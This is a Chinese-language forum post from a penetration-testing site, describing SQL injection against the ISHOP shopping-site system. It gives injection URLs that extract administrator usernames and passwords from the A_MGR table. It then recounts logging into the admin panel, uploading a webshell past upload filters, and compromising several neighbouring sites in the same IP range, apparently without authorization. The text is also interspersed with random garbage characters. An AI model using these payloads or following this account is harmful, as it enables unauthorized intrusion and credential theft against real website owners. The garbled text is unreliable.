中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
) V  Q1 ~. o1 fhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
8 P. ^9 Z* R; W2 X" _0 F9 D/ e  o" N) {# c
习惯性的加’having1=1--
$ T7 H; A8 C- O" B% y+ Y6 E& n, d  d" ^6 B+ Q* o+ @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
* g7 d6 o2 y, z9 X5 b& l0 b) o" Q  n6 n! s
0
5 t4 f3 {* j9 k
) L/ y: Z: r* Z% G" h3 X3 X9 v爆出Diary_A.dl_Title(这时候很激动啊)
  x5 b5 [, r8 k; t  k
1 i" E  ~' n# b8 g那么继续
7 O+ A7 ]' T; T5 M, E/ f% n8 chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
2 p4 U. y$ s; Z, M( H1 s& d* ?' a8 [% \" t9 @7 B
继续,一直爆下去' V& W* [7 Y8 e
3 }1 J" ^5 e; ^- p. Z
爆到几个字段和表段 但是没找到需要的管理用户的字段0 W  O( e  x6 b" E# Y. K
, {! X' X% u' f2 E
蛋疼了 怎么办 然后去后台登陆页看源码5 w% y# p: ]- v) e3 o# B' ]
! s0 n# T& b9 J% C! p. [& ~
0- G. e) h: I2 V

7 I+ V% w5 h" A  {Input name= “ADUID”. ^5 g: d7 V+ |, J/ f4 a
Input name= “ADPWD”
! U- M& D2 p1 _- W- a# C# D/ f) _& l1 f$ j
很幸运 找到了字段那就继续1 y1 I. c& \5 q- d
找到之后开始爆用户
2 R  w1 f3 t# g; V9 B0 [& Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
3 Y, \/ f. Y* w, I爆密码
! Y2 C  F: Z! |5 _4 E4 Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—0 ]1 y7 H5 {7 T& n$ x
测试了下 这个注入点只能爆到文章哪里的表
' U# R7 ?7 R6 N/ C" K$ N' @1 x1 M+ H. f, J6 {
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了$ Q$ b: x4 I$ P
3 o$ T- j: n% x
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
" x. G5 C) K; b" z8 Y: U$ C, G
+ [/ h( O' y" N0 o) Z3 ~/ a473
& r, u! X  z, {9 a
0 u6 ~2 G8 j3 \, \' [7 V  D$ `进后台2 P! Q# N2 _+ d; v) n
4 L9 L. X* T# Q' ?

  b! D' @! e. J- S5 g* k- N* Q发现几个上传点 有的地方不能上传 而且防止恶意代码' j3 A& M( Q8 e

  e1 \5 G& ~$ B+ v0 M1 H没办法 各种百度各种找大牛 找到一只好像可以突破的马, v5 Z% U% k1 U% S( H; C( I7 T
+ K! R+ ?) C% s% G

" e! }9 I+ u- I6 P在系统管理那里直接上传 不过没有显示地址* ?9 c* @1 @; C

7 s4 S  W: y; I8 S- n再上传一次 抓包 搞定OK
, q+ t0 q* B, ?+ O, E0 E8 O% T; A. f4 N/ Y

2 ?/ [! f4 R3 L2 Y8 D1 \  J* L) ~# h: @. M( u% \+ M
472
4 Z7 E7 H& x% K* z+ R' o2 ~, S+ e- l+ Y' s% T- U. |- I: o+ P
晚上不行了 去睡觉。。。. e. O3 t, z: c
第二天刚起床 闲的没事做继续日站吧 8 w3 h7 |. t8 u5 m% v

4 n9 w0 d7 b5 B: Q7 Z& M3 w) e: Z6 {找个站 就把这个站的旁c扫了下
6 F8 \/ t! F6 N% i1 |6 V
' {9 K  {6 b& ^$ r" S' K0 c发现c段也有一个购物站 ,然后还和这个站的模板差不多
" g% B9 y6 r3 d. B; l
: T) t0 U: l2 X. \+ R) a9 u就找到会员登录口测试
9 E- Y6 Q! W4 v, H$ U. ?" e2 ?5 `' f. k# M, p
'and (select top 1 MGR_UID from A_MGR)>0—! U! |: p6 _5 W( `" H
果断爆到了 这时候我很激动 通杀
) L( [# q/ Z# T+ d# v) u+ c( N  Q5 S4 C5 K+ G1 v) E+ @
再次翻c段& U  Y1 k* R4 K1 W: j: ?1 N

2 W6 b- t" \) ?/ \翻出几个站 都成功拿下0 p# ~' U! t0 {9 {  c. u
2 K% t+ [" F2 @, G  e* Q
  a! h- G# q0 H# k% q( U" F

& y$ [, Q1 i- Z2 ~4 H  D* I修复方案:; {) @2 b! x" O1 M& f1 R
他们比我专业
, M6 E9 p+ o$ K8 p! d) {2 m' g
: I/ K. B0 o5 x. S
4 Z& R9 X( R4 x) F* G" f5 O
: g6 W1 S* U, t# a; o7 p* }7 t



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2